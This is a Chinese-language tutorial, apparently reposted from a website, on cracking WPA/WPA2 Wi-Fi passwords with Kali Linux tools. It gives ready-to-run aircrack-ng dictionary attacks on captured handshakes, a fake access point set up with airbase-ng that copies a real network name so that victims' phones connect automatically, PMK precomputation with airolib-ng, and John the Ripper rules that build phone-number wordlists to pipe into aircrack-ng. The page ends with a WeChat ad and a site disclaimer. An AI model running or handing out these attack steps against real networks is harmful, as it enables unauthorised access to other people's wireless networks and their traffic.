WPA攻击
WPA PSK攻击
- 只有一种密码破解方法
- WPA不存在WEP的弱点
- 只能暴力破解
- 网上共享的字典
- 泄露密码
- 地区电话号码段
- Crunch生成字段
- kali中自带的字典文件
- CPU资源
- 时间
- 字典质量
PSK破解过程
- 启动monitor(之前讲过略)
- 开启抓包并保存(之前讲过略)
- Deauthentication 攻击获取4步握手信息(之前讲过略)
- 使用字段暴力破解
kali自带的字典:

aircrack-ng -w [字典文件] [.cap包]

- kali自带的其他密码字典


无AP情况下的WPA密码破解
- 启动monitor
- 开始抓包并保存
- 根据probe信息伪造相同ESSID的AP
- 抓取四部握手中的前两个包
- 使用字典暴力破解
使用的原理就是终端会去寻找AP,但是此AP可能在现存环境不存在,我们可以伪装AP。
airbase-ng --essid TP-LINK_E6AD -c 1 wlan0mon
#用于伪装AP

此时就能搜索这个AP

- 但是你并不能判断原先这个AP用什么样的加密方式,所以我们可以来生成加密方式
airbase-ng --essid TP-LINK_E6AD -c 1 -z 2 wlan0mon
#-z表示生成WPA1加密机制,2表示加密算法为TKIP
airbase-ng --essid TP-LINK_E6AD -c 1 -Z 4 wlan0mon
#-Z表示生成WPA2加密机制,4表示加密算法为CCMP
用法如下:
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
- 然后别人手机之前保存过密码会自动连接,然后就会产生四次握手数据,然后通过Aircrack去跑字典暴力破解密码
AIROLIB破解密码
- 设计用于存储ESSID和密码列表
- 计算生成不变的PMK(计算资源消耗性)
- PMK在破解阶段被用于计算PTK(速度快,计算资源要求少)
- 通过完整性摘要破解密码
- SQLite3数据库存储数据
流程如下:
- 将AP的essid保存到文本中
echo [essid] > [txt文档]
- 创建一个数据库
airolib-ng db --import essid [txt文档]
- 查看数据库状态
airolib-ng db --stats
- 导入字典并会自动剔除不可用密码
airolib-ng db --import passwd 【字典文件】
- 计算PMK哈希值
airolib-ng db --batch
- 开始破解
aircrack-ng -r db 【.cap包】
JTR破解密码
- John the ripper
- 快速的密码破解软件
- 支持基于规则扩展密码字典
- 很多人喜欢用手机号码作为无线密码
- 获取号段并利用JTR规则增加最后几位的数字
- 配置文件 /etc/john/john.conf
- [List.Rules:Wordlist]
- $[0-9]$[0-9]$[0-9]
- 测试效果
john --wordlist=password.lst --rules --stdout | grep -i Password123
- 破解调用
john --wordlist=pass.list --rules --stdout | aircrack-ng -e kifi -w wpa.cap
创业项目群,学习操作 18个小项目,添加 微信:80709525 备注:小项目!
本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 sumchina520@foxmail.com 举报,一经查实,本站将立刻删除。
如若转载,请注明出处:https://www.11in.com/14289.html
如若转载,请注明出处:https://www.11in.com/14289.html